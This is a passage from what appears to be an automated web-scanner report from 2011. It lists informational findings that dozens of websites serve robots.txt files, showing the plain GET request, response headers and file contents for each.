Accept-Ranges: bytes
Content-Length: 1645
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.1113. http://www.mscursor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mscursor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mscursor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://mscursor.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://mscursor.com/sitemap.xml.gz

27.1114. http://www.msginsider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msginsider.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msginsider.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:40 GMT
Content-type: text/plain
Last-modified: Fri, 16 Apr 2010 20:29:08 GMT
Content-length: 764
Accept-ranges: bytes
Connection: close

# robots.txt for http://www.msginsider.com/

User-agent: *
Disallow: /manage/
Disallow: /unsubscribe.html
Disallow: /unsubscribe-success.html
Disallow: /chicagotheatre/unsubscribe.html
Disallow: /chic
...[SNIP]...

27.1115. http://www.msi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:40 GMT
Server: Apache/2.2.17 (FreeBSD) DAV/2 PHP/5.3.4 mod_ssl/2.2.17 OpenSSL/0.9.8k
Last-Modified: Fri, 21 Jan 2011 06:48:54 GMT
ETag: "341c0bc-22-49a55a4c34180"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /modules


27.1116. http://www.mtv.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Fri, 27 Apr 2007 18:19:47 GMT
ETag: "55a5343-32-42f1c2e2af6c0"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Wed, 04 May 2011 03:27:55 GMT
Connection: close

User-agent: Googlebot
Disallow: /broadband_mac/

27.1117. http://www.mudeta.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mudeta.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mudeta.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Sat, 04 Dec 2010 19:21:06 GMT
ETag: "26bc9d9-12bb-4969a8e74ec80"
Accept-Ranges: bytes
Content-Length: 4795
Connection: close
Content-Type: text/plain


Disallow:


Disallow: /shop.php?a=cartview
Disallow: /shop.php?a=advanced


Disallow: /ship.php
Disallow: /page-shippinginfo.html
Disallow: /ppolicy.php
Disallow: /page-privacypolicy.html


User-ag
...[SNIP]...

27.1118. http://www.muft.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.muft.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.muft.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 26 Apr 2010 06:12:01 GMT
ETag: "99423f3-11e-4851da7b44e40"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.1119. http://www.murad.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.murad.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.murad.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:42 GMT
Server: Oracle HTTP Server Powered by Apache
Last-Modified: Wed, 09 Mar 2011 01:58:39 GMT
ETag: "213b68-26b2-4d76decf"
Accept-Ranges: bytes
Content-Length: 9906
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cleansers/
Disallow: /treatments/
Disallow: /moisturizers/
Disallow: /supplements/
Disallow: /eye-care/
Disallow: /toners/
Disallow: beta2.murad.com/
Disallow: http://beta2.mu
...[SNIP]...

27.1120. http://www.musclemustangfastfords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musclemustangfastfords.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musclemustangfastfords.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:39:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=av4vis2p5j2ynrymfojo5rrm; path=/; HttpOnly
Set-Cookie: UserPuid=2338256194513534267; domain=musclemustangfastfords.com; expires=Wed, 04-May-2061 01:39:02 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

27.1121. http://www.mustang50magazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mustang50magazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mustang50magazine.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:17:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ly3zr455jrrqnp552fgx3055; path=/; HttpOnly
Set-Cookie: UserPuid=2344197920277217340; domain=mustang50magazine.com; expires=Wed, 04-May-2061 03:17:31 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

27.1122. http://www.mustsharejokes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mustsharejokes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mustsharejokes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:42 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 19:37:00 GMT
Accept-Ranges: bytes
Content-Length: 373
Connection: close
Content-Type: text/plain

# google adsense
User-agent: Mediapartners-Google*
Disallow:

# everything else
User-agent: *
Disallow: /scripts/
Disallow: /dialog/
Disallow: /tag/
Disallow: /pageSearch
Disallow: /accountS
...[SNIP]...

27.1123. http://www.muvids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.muvids.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.muvids.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:12 GMT
Server: Apache
Last-Modified: Wed, 18 Nov 2009 01:55:23 GMT
ETag: "1201f53-3d-4789b8924d8c0"
Accept-Ranges: bytes
Content-Length: 61
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cgi-bin

Disallow: /images/


27.1124. http://www.my1.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my1.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.my1.ru

Response

HTTP/1.1 200 OK
Server: uServ/1.5.4
Date: Wed, 04 May 2011 00:57:03 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 244
Last-Modified: Tue, 30 Nov 2010 10:46:48 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /?uz=
Disallow: /?pguid=
Disallow: /?l=
Disallow: /main/?a=login
Disallow: /main/?a=reg
Disallow: /main/?a=charity
Disallow: /main/?a=td
Disallow: /main/?a=location
Disallow: /
...[SNIP]...

27.1125. http://www.myaddiction.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myaddiction.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myaddiction.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 17 Nov 2010 00:43:18 GMT
ETag: "3e8c99-72f-49534f5971580"
Accept-Ranges: bytes
Content-Length: 1839
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:40:52 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.1126. http://www.mybudget360.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybudget360.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mybudget360.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.mybudget360.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1127. http://www.mybusinesslisting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mybusinesslisting.com

Response

HTTP/1.1 200 OK
Content-Length: 81
Content-Type: text/plain
Last-Modified: Sat, 23 May 2009 17:39:47 GMT
Accept-Ranges: bytes
ETag: "86ab9177cddbc91:ea6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Wed, 04 May 2011 01:43:49 GMT
Connection: close

User-agent:    *
Disallow:    /link/partners.asp
Disallow:    /contact/
Disallow:    /r/

27.1128. http://www.mycoincollecting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycoincollecting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycoincollecting.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Mar 2005 19:28:26 GMT
ETag: "12c00b4-26-3f25f08590a80"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /store/admin/

27.1129. http://www.mycreditkeeper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycreditkeeper.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycreditkeeper.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26
Content-Type: Text/plain; charset=utf-8
X-Served-By: ASH
Date: Wed, 04 May 2011 01:08:02 GMT
Connection: close

User-agent: *
Disallow: /

27.1130. http://www.mycusthelp.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycusthelp.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycusthelp.net

Response

HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/plain
Last-Modified: Thu, 24 Jul 2008 16:23:29 GMT
Accept-Ranges: bytes
ETag: "c2c1d39ba9edc81:15b8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:09:36 GMT
Connection: close

User-agent: *
Disallow:
Crawl-delay: 240

27.1131. http://www.myeasytv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myeasytv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myeasytv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:02 GMT
Server: Apache
Last-Modified: Sat, 06 Feb 2010 13:51:27 GMT
ETag: "1911179-69-4b6d73df"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /movie-download.php
Disallow: /adult/porn-blog/
Disallow: */feed
Disallow: /blog/

27.1132. http://www.mygames4girls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mygames4girls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mygames4girls.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:57 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.5-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 18 Feb 2011 12:21:26 GMT
ETag: "eacb-1f5-49c8d8d8f1649"
Accept-Ranges: bytes
Content-Length: 501
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 01:47:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_config-rating.php
Disallow: /_drawrating.php
Disallow: /rpc.php
Disallow: /db.php
Disallow: /js/
Disallow: /stars/
Disallow: /surprises/
Disallow: /maquillage/
Disallow: /cui
...[SNIP]...

27.1133. http://www.myjellybean.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myjellybean.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myjellybean.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:03:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 17 Aug 2009 05:12:32 GMT
ETag: "21d2a5-130-4714f72f73000"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1134. http://www.myjizztube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myjizztube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myjizztube.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:20 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17
Last-Modified: Sat, 24 Apr 2010 15:21:12 GMT
ETag: "8c-4bd30c68"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /content/
Disallow: /ftp_content/
Disallow: /includes/
Disallow: /process/

27.1135. http://www.mylabsplus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylabsplus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylabsplus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:02 GMT
Last-Modified: Mon, 28 Dec 2009 20:31:19 GMT
ETag: "2194c9b-636-47bcfc9af53c0"
Accept-Ranges: bytes
Content-Length: 1590
Content-Type: text/plain
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1136. http://www.mylanguageexchange.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylanguageexchange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylanguageexchange.com

Response

HTTP/1.1 200 OK
Content-Length: 1135
Content-Type: text/plain
Last-Modified: Sat, 22 May 2010 23:58:27 GMT
Accept-Ranges: bytes
ETag: "186322acafaca1:287"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:50:02 GMT
Connection: close

User-agent: *
Disallow: /test/
Disallow: /FAQMembers.asp
Disallow: /FAQMembers_spn.asp
Disallow: /FAQMembers_fr.asp
Disallow: /FAQMembers_gmn.asp
Disallow: /FAQMembers_chisim.asp
Disallow: /FA
...[SNIP]...

27.1137. http://www.mylasagnarecipe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylasagnarecipe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylasagnarecipe.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://mylasagnarecipe.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1138. http://www.mylovedhair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedhair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedhair.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Wed, 04 May 2011 03:07:15 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 19 Nov 2009 06:16:34 GMT
ETag: "710088-51-4b04e2c2"
Accept-Ranges: bytes
Content-Length: 81

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedhair.com/sitemap.xml

27.1139. http://www.mylovedtwinks.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedtwinks.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedtwinks.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:01:26 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 05 Nov 2009 11:26:43 GMT
ETag: "960021-52-4af2b673"
Accept-Ranges: bytes
Content-Length: 82

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedtwinks.tv/sitemap.xml

27.1140. http://www.mymovies.it/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mymovies.it
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mymovies.it

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 17 Apr 2011 13:18:50 GMT
Accept-Ranges: bytes
ETag: "0d97ffd1fdcb1:0"
Server: Microsoft-IIS/7.5
Connection: close
Date: Wed, 04 May 2011 02:53:18 GMT
Age: 3247
Content-Length: 27

User-agent: *
Allow: /


27.1141. http://www.myniceprofile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myniceprofile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myniceprofile.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1860997365"
Last-Modified: Sat, 13 May 2006 18:31:07 GMT
Content-Length: 209
Connection: close
Date: Wed, 04 May 2011 01:05:26 GMT
Server: WebServer

User-agent: *
Disallow: /aggregator
Disallow: /tracker
Disallow: /comment/reply
Disallow: /node/add
Disallow: /user
Disallow: /files
Disallow: /search
Disallow: /book/print
User-agent: ia_archiver
Dis
...[SNIP]...

27.1142. http://www.myrecordjournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecordjournal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myrecordjournal.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2079768
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:11:55 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0355
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: myrecordjournal.com
X-TNCMS-Served-By: cmsapp9
Content-Length: 1684

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.1143. http://www.mysinablog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysinablog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mysinablog.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:58 GMT
Last-Modified: Tue, 14 Oct 2008 09:16:58 GMT
Accept-Ranges: bytes
Content-Length: 709
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt for http://www.mysinablog.com
# last updated: 8th Oct 2008
#

User-agent: hl_ftien_spider
Disallow: /

User-agent: larbin
Disallow: /

User-agent: wget
Disallow: /

User-agent: libwww
D
...[SNIP]...

27.1144. http://www.myspacebrand.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspacebrand.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspacebrand.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:54:57 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Sun, 17 Sep 2006 23:56:56 GMT
ETag: "885070-18-450de0c8"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1145. http://www.mytones.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytones.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytones.us

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 07 Jan 2011 16:15:33 GMT
ETag: "8a60c87-1a-49943ed7b9340"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1146. http://www.mytopdozen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytopdozen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytopdozen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:15:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Last-Modified: Wed, 03 Sep 2008 16:19:11 GMT
ETag: "134f0290-4e-456003250fdc0"
Accept-Ranges: bytes
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /*.php?*

User-agent: Slurp
Disallow: /*.php?*

27.1147. http://www.mytraf.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytraf.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytraf.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:05 GMT
Server: Apache/2.0.51 (Fedora)
Last-Modified: Fri, 12 Sep 2008 22:02:45 GMT
ETag: "2239ea5-11b-b940b40"
Accept-Ranges: bytes
Content-Length: 283
Connection: close
Content-Type: text/plain; charset=WINDOWS-1251

User-Agent: Yandex
Allow: /index.php
Allow: /faq.php
Disallow: /

User-Agent: *
Disallow: /geoip/
Disallow: /kupia/
Disallow: /dursh/
Disallow: /sloox/
Disallow: /motor/
Disallow: /traf.php
...[SNIP]...

27.1148. http://www.myverizonwireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myverizonwireless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myverizonwireless.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:03:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

27.1149. http://www.myweather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myweather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myweather.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:31:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 3236
X-PageAssembler: Build 4.9.000;cc:
servername: www11

###############################################################
# #
# .-. #
#
...[SNIP]...

27.1150. http://www.nabp.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nabp.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nabp.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 08 Apr 2010 22:01:09 GMT
ETag: "205ba-18-483c0d0ed1340"
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.1151. http://www.nailedstuds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nailedstuds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nailedstuds.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:57:15 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.1
Vary: Cookie
X-Pingback: http://nailedstuds.com/xmlrpc.php
Content-Length: 24

User-agent: *
Disallow:

27.1152. http://www.nappturality.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nappturality.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

